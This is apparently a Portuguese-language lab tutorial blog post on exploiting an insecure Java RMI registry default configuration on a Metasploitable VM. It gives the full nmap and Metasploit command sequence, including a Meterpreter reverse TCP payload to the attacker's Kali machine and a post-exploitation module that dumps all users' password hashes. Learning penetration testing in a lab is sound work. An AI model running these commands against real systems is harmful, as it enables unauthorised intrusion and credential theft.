terça-feira, 7 de março de 2023

Teste de Penetração + Metaspoitable Framework: Aproveitando de uma Informação: RMI Registry foi detectado

 Vulnerabilidades listada como "INFO" não são necessariamente vulnerabilidades, mas podem também ser aproveitadas se souber o que procurar. Por exemplo, a INFO "RMI Registry Detection". RMI Registry é usado pelo Java, então, vamos ver o que podemos fazer:


Da mesma forma que o post anterior, podemos ver detalhes do servidor e porta:

Mas só porque temos a porta do RMI, não quer dizer que a porta listada esteja vulneravel, mas podemos explorar para ver se achamos uma outras portas abertas por causa de uma falha de um programador, por exemplo. Vamos fazer isso com o seguinte comando:

nmap -sV -sS 10.0.2.4 -p1-65535

isso permitirá ver se tem portas abertas. Provavelmente, não irá encontrar nada, mas então, vamos pedir uma ajudinha para uma outra ferramenta. 

Em um outro terminal, vamos rodar o Metaspoitable Framework, com o comando

msfconsole

e depois de iniciado. digitamos

search java_rmi

Aqui podemos ver duas vulnerabilidades:



Destaquei na imagem a vulnerabilidade que escolhi atacar: a configuração padrão inseguro. Vamos nos aprofundar neste item usando o comando

use exploit/multi/misc/java_rmi_server 

o Metaspoitable vai explicar que a configuração padrão quando não existe um Payload configurado é ir direto para java/meterpreter/reverse_tcp. Vamos ver os payloads padrões usando o comando 

show payloads



Agora, vamos setar o payload do MSF para payload/java/meterpreter/reverse_tcp 

set payload payload/java/meterpreter/reverse_tcp 

e agora vamos mostrar os parâmetros que podemos usar:

show options

Agora alteraremos o parâmetro RHOST com o IP da máquina alvo:

set RHOST 10.0.2.4

e vamos setar o parâmetro SRVHOST com o IP do Kali (o que estamos usando):

set SRVHOST 10.0.2.15

e também vamos setar o LHOST para a nossa máquina:

set LHOST 10.0.2.15




e agora finalmente, vamos rodar o exploit com o comando:

exploit

Com isso, conseguimos uma sessão Meterpreter aberta;


E o que podemos fazer com uma sessão dessas aberta? 
se eu enviar um sysinfo, vamos obter informações do sistema.


e se enviar o seguinte comando:

run post/linux/gather/hashdump

e teremos uma lista de Hash das senhas de todos os usuários do sistema

E isso tudo, conseguindo explorar apenas com uma informação no início. Portanto, não subestime uma INFO.

Nenhum comentário:

Postar um comentário